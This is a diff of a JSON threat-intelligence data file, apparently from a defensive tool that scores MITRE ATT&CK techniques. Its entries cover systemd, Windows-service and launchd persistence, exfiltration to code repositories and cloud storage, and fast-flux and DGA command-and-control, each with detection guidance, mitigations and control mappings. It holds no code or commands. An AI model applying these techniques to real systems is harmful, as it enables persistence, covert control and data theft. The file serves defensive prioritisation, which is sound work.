+                "url": "https://attack.mitre.org/mitigations/M1021"
             }
         ],
-        "cumulative_score": 0.41972452904761903,
-        "adjusted_score": 0.41972452904761903,
+        "cumulative_score": 0.3047619047619048,
+        "adjusted_score": 0.3047619047619048,
         "has_car": false,
-        "has_sigma": false,
+        "has_sigma": true,
         "has_es_siem": false,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [
-            "3.6",
-            "4.1",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8",
-            "7.1",
-            "7.2",
-            "7.3",
-            "7.5",
-            "18.3",
-            "18.5"
+            "2.3",
+            "2.5",
+            "9.3"
         ],
         "nist_controls": [
+            "AC-16",
             "AC-2",
+            "AC-20",
+            "AC-23",
             "AC-3",
-            "AC-5",
+            "AC-4",
             "AC-6",
-            "CA-8",
-            "CM-3",
-            "CM-5",
-            "CM-6",
-            "CM-8",
-            "IA-2",
-            "IA-7",
-            "IA-8",
-            "RA-9",
-            "SA-10",
-            "SA-11",
-            "SC-34",
+            "CA-3",
+            "CA-7",
+            "SA-8",
+            "SA-9",
+            "SC-28",
+            "SC-31",
             "SC-7",
-            "SI-2",
-            "SI-7"
+            "SI-3",
+            "SI-4",
+            "SR-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.20476190476190478,
+            "mitigation_score": 0.36363636363636365,
+            "detection_score": 0.03
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1567.001",
+        "name": "Exfiltration Over Web Service: Exfiltration to Code Repository",
+        "description": "Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.\n\nExfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. ",
+        "url": "https://attack.mitre.org/techniques/T1567/001",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1567",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            }
+        ],
+        "cumulative_score": 0.19523809523809524,
+        "adjusted_score": 0.19523809523809524,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "9.3"
+        ],
+        "nist_controls": [
+            "AC-20",
+            "AC-4",
+            "SC-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1567.002",
+        "name": "Exfiltration Over Web Service: Exfiltration to Cloud Storage",
+        "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ",
+        "url": "https://attack.mitre.org/techniques/T1567/002",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1567",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            }
+        ],
+        "cumulative_score": 0.17619047619047618,
+        "adjusted_score": 0.17619047619047618,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "9.3"
+        ],
+        "nist_controls": [
+            "AC-20",
+            "AC-4",
+            "SC-7"
         ],
         "process_coverage": true,
         "network_coverage": true,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.319047619047619,
-            "mitigation_score": 0.6,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00067691
+        "hardware_coverage": false
     },
     {
-        "tid": "T1543",
-        "name": "Create or Modify System Process",
-        "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.  \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection).  ",
-        "url": "https://attack.mitre.org/techniques/T1543",
+        "tid": "T1568",
+        "name": "Dynamic Resolution",
+        "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)",
+        "url": "https://attack.mitre.org/techniques/T1568",
         "tactics": [
-            "Persistence",
-            "Privilege Escalation"
+            "Command And Control"
         ],
-        "detection": "Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.  \n\nCommand-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. \n\nMonitor for changes to files associated with system-level processes.",
+        "detection": "Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "File: File Creation",
-            "File: File Modification",
-            "Process: OS API Execution",
-            "Process: Process Creation",
-            "Service: Service Creation",
-            "Service: Service Modification",
-            "Windows Registry: Windows Registry Key Creation",
-            "Windows Registry: Windows Registry Key Modification"
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1543.001",
-                "name": "Create or Modify System Process: Launch Agent",
-                "url": "https://attack.mitre.org/techniques/T1543/001",
-                "description": "Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.\n\n Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.\n \nAdversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) ",
-                "detection": "Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.\n\nEnsure Launch Agent's  ProgramArguments  key pointing to executables located in the /tmp or /shared folders are in alignment with enterprise policy. Ensure all Launch Agents with the RunAtLoad key set to true are in alignment with policy. ",
+                "tid": "T1568.001",
+                "name": "Dynamic Resolution: Fast Flux DNS",
+                "url": "https://attack.mitre.org/techniques/T1568/001",
+                "description": "Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)\n\nThe simplest, \"single-flux\" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)\n\nIn contrast, the \"double-flux\" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.",
+                "detection": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.",
                 "mitigations": []
             },
             {
-                "tid": "T1543.002",
-                "name": "Create or Modify System Process: Systemd Service",
-                "url": "https://attack.mitre.org/techniques/T1543/002",
-                "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:\n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)",
-                "detection": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:\n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)",
-                "mitigations": [
-                    {
-                        "mid": "M1033",
-                        "name": "Limit Software Installation",
-                        "description": "Block users or groups from installing unapproved software.",
-                        "url": "https://attack.mitre.org/mitigations/M1033"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
-            },
-            {
-                "tid": "T1543.003",
-                "name": "Create or Modify System Process: Windows Service",
-                "url": "https://attack.mitre.org/techniques/T1543/003",
-                "description": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). \n\nAdversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.\n\nAn adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. \n\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). ",
-                "detection": "Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts.  \n\nLook for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns)  \n\nCreation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.\n\nSuspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+                "tid": "T1568.002",
+                "name": "Dynamic Resolution: Domain Generation Algorithms",
+                "url": "https://attack.mitre.org/techniques/T1568/002",
+                "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)",
+                "detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
                     },
                     {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1021",
+                        "name": "Restrict Web-Based Content",
+                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1021"
                     }
                 ]
             },
             {
-                "tid": "T1543.004",
-                "name": "Create or Modify System Process: Launch Daemon",
-                "url": "https://attack.mitre.org/techniques/T1543/004",
-                "description": "Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)\n\nAdversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)\n\nAdditionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)",
-                "detection": "Monitor for new files added to the /Library/LaunchDaemons/ folder. The System LaunchDaemons are protected by SIP.\n\nSome legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the RunAtLoad parameter set to true, ensure the Program parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as Program and ProgramArguments parameters but one must be present.(Citation: launchd Keywords for plists)\n\n",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
+                "tid": "T1568.003",
+                "name": "Dynamic Resolution: DNS Calculation",
+                "url": "https://attack.mitre.org/techniques/T1568/003",
+                "description": "Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)\n\nOne implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)",
+                "detection": "Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.",
+                "mitigations": []
             }
         ],
         "mitigations": [
             {
-                "mid": "M1047",
-                "name": "Audit",
-                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                "url": "https://attack.mitre.org/mitigations/M1047"
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
             },
             {
-                "mid": "M1033",
-                "name": "Limit Software Installation",
-                "description": "Block users or groups from installing unapproved software.",
-                "url": "https://attack.mitre.org/mitigations/M1033"
-            },
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            }
+        ],
+        "cumulative_score": 0.2547619047619048,
+        "adjusted_score": 0.2547619047619048,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "9.2",
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "SC-20",
+            "SC-21",
+            "SC-22",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.10476190476190478,
+            "mitigation_score": 0.2
+        },
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1568.001",
+        "name": "Dynamic Resolution: Fast Flux DNS",
+        "description": "Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)\n\nThe simplest, \"single-flux\" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)\n\nIn contrast, the \"double-flux\" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.",
+        "url": "https://attack.mitre.org/techniques/T1568/001",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1568",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.12857142857142856,
+        "adjusted_score": 0.12857142857142856,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1568.002",
+        "name": "Dynamic Resolution: Domain Generation Algorithms",
+        "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)",
+        "url": "https://attack.mitre.org/techniques/T1568/002",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1568",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "mid": "M1022",
-                "name": "Restrict File and Directory Permissions",
-                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1022"
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
             },
             {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
             }
         ],
-        "cumulative_score": 1.7666666666666666,
-        "adjusted_score": 1.7666666666666666,
